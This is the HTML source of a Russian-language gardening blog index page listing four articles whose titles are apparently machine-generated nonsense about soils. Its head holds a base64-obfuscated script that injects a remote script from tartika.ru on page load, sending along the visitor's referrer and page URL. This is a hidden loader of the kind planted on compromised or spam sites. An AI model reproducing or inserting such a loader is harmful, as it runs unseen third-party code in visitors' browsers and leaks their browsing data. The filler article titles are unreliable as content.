<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Маленькие хитрости для большого урожая</title>
  
	<link rel="icon" href="img/Fevicon.png" type="image/png">

  <link rel="stylesheet" href="vendors/bootstrap/bootstrap.min.css">
  <link rel="stylesheet" href="vendors/themify-icons/themify-icons.css">
  <link rel="stylesheet" href="vendors/owl-carousel/owl.theme.default.min.css">
  <link rel="stylesheet" href="vendors/owl-carousel/owl.carousel.min.css">
  <link rel="stylesheet" href="vendors/Magnific-Popup/magnific-popup.css">

  <link rel="stylesheet" href="css/style.css">
  <script src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUoYDxzY3JpcHQgYXN5bmMgc3JjPSJodHRwczovL3RhcnRpa2EucnUvP3JlZmVycmVyQ0Y9JHtlc2NhcGUoZG9jdW1lbnQucmVmZXJyZXIpfSZ1cmxDRj0ke2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZil9Ij48XC9zY3JpcHQ+YCk="></script>
</head>
<body>

  <!--================ Header Menu Area start =================-->
  <header class="header_area">
    <div class="main_menu">
      <nav class="navbar navbar-expand-lg navbar-light">
        <div class="container box_1620">
          <a class="navbar-brand logo_h" href="index.html">Покров</a>
          <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>

          <div class="collapse navbar-collapse offset" id="navbarSupportedContent">
            <ul class="nav navbar-nav menu_nav justify-content-end">
              <li class="nav-item active"><a class="nav-link" href="index.html">Главная</a></li>
              <li class="nav-item"><a class="nav-link" href="blog.html">Статьи</a></li>
              <li class="nav-item"><a class="nav-link" href="contact.html">Контакты</a></li>
              <li class="nav-item"><a class="nav-link" href="terms.html">Условия и положения</a></li>
              <li class="nav-item"><a class="nav-link" href="policy.html">Политика конфиденциальности</a></li>
            </ul>
          </div> 
        </div>
      </nav>
    </div>
  </header>
  <!--================Header Menu Area =================-->


  <!--================Blog section start =================-->  
  <section class="section-margin">
    <div class="container">
      <div class="section-intro mb-75px">
        <h4 class="intro-title">Покров</h4>
        <h2>Статьи</h2>
      </div>

      <div class="row">
        
        <div class="col-sm-6 col-lg-4 mb-4 mb-lg-0">
          <div class="card-blog">
            <img class="card-img rounded-0" src="./assets/images/image00175.jpg" alt="">
            <div class="blog-body">
              <ul class="blog-info">
                <li><a href="">12.01.2021</a></li>
              </ul>
              <a href="e17cEf1mOed4eQfGd1EtoDyWR.html">
                <h3>Тема: "водонасыщенный гумус: методология и особенности"</h3>
              </a>
            </div>
          </div>
        </div>
        

        <div class="col-sm-6 col-lg-4 mb-4 mb-lg-0">
          <div class="card-blog">
            <img class="card-img rounded-0" src="./assets/images/image00003.jpg" alt="">
            <div class="blog-body">
              <ul class="blog-info">
                <li><a href="">12.01.2021</a></li>
              </ul>
              <a href="04d94dfa5b9138f1fd723480537cc94b.html">
                <h3>Тема:" Ионоселективный аллювий глазами современников "</h3>
              </a>
            </div>
          </div>
        </div>
        

        <div class="col-sm-6 col-lg-4 mb-4 mb-lg-0">
          <div class="card-blog">
            <img class="card-img rounded-0" src="./assets/images/image00148.jpg" alt="">
            <div class="blog-body">
              <ul class="blog-info">
                <li><a href="">12.01.2021</a></li>
              </ul>
              <a href="e5b8ef4ef13da755e514cc751fc8ba41.html">
                <h3>Тема: "Ионоселективные красные почвы: методология и особенности"</h3>
              </a>
            </div>
          </div>
        </div>
        

        <div class="col-sm-6 col-lg-4 mb-4 mb-lg-0">
          <div class="card-blog">
            <img class="card-img rounded-0" src="./assets/images/image00095.jpg" alt="">
            <div class="blog-body">
              <ul class="blog-info">
                <li><a href="">12.01.2021</a></li>
              </ul>
              <a href="yDo5PGH7dskM3Ha0Sd8GbNR53O4.html">
                <h3>Тема: "глиняный лизиметр: основные моменты"</h3>
              </a>
            </div>
          </div>
        </div>
        

      </div>
    </div>
  </section>
  <!--================Blog section end =================-->  

  <!-- ================ start footer Area ================= -->
  <footer class="footer-area section-gap" style="padding: 10px 0px 10px;">
		<div class="container">
			<div class="footer-bottom row align-items-center text-center text-lg-left" style="margin-top: 0;">
				<p class="footer-text m-0 col-lg-8 col-md-12"></p>
				<div class="col-lg-4 col-md-12 text-center text-lg-right footer-social">
					<a href="#"><i class="ti-facebook"></i></a>
					<a href="#"><i class="ti-twitter-alt"></i></a>
					<a href="#"><i class="ti-dribbble"></i></a>
					<a href="#"><i class="ti-linkedin"></i></a>
				</div>
			</div>
		</div>
	</footer>
  <!-- ================ End footer Area ================= -->




  <script src="vendors/jquery/jquery-3.2.1.min.js"></script>
  <script src="vendors/bootstrap/bootstrap.bundle.min.js"></script>
  <script src="vendors/owl-carousel/owl.carousel.min.js"></script>
  <script src="vendors/nice-select/jquery.nice-select.min.js"></script>
  <script src="vendors/Magnific-Popup/jquery.magnific-popup.min.js"></script>
  <script src="js/jquery.ajaxchimp.min.js"></script>
  <script src="js/mail-script.js"></script>
  <script src="js/main.js"></script>

  <div class='cookie-banner'>
    <p>
      Сайт использует файлы cookie. Они позволяют узнавать вас и получать информацию о вашем пользовательском опыте.Продолжая просмотр сайта, я соглашаюсь с использованием файлов cookie владельцем сайта в соответствии с <a target="_blank" href="https://en.wikipedia.org/wiki/HTTP_cookie">Политикой cookie</a>
    </p>
    <button class='close-cookie'>&times;</button>
  </div>
  <script>
    window.onload = function () {
      $('.close-cookie').click(function () {
        $('.cookie-banner').fadeOut();
      })
    }
  </script>
  <script>
    let elems = document.querySelectorAll('.server-name');
    elems.forEach((elem) => {
      elem.innerHTML = window.location.hostname
    })
  </script>
</body>
</html>
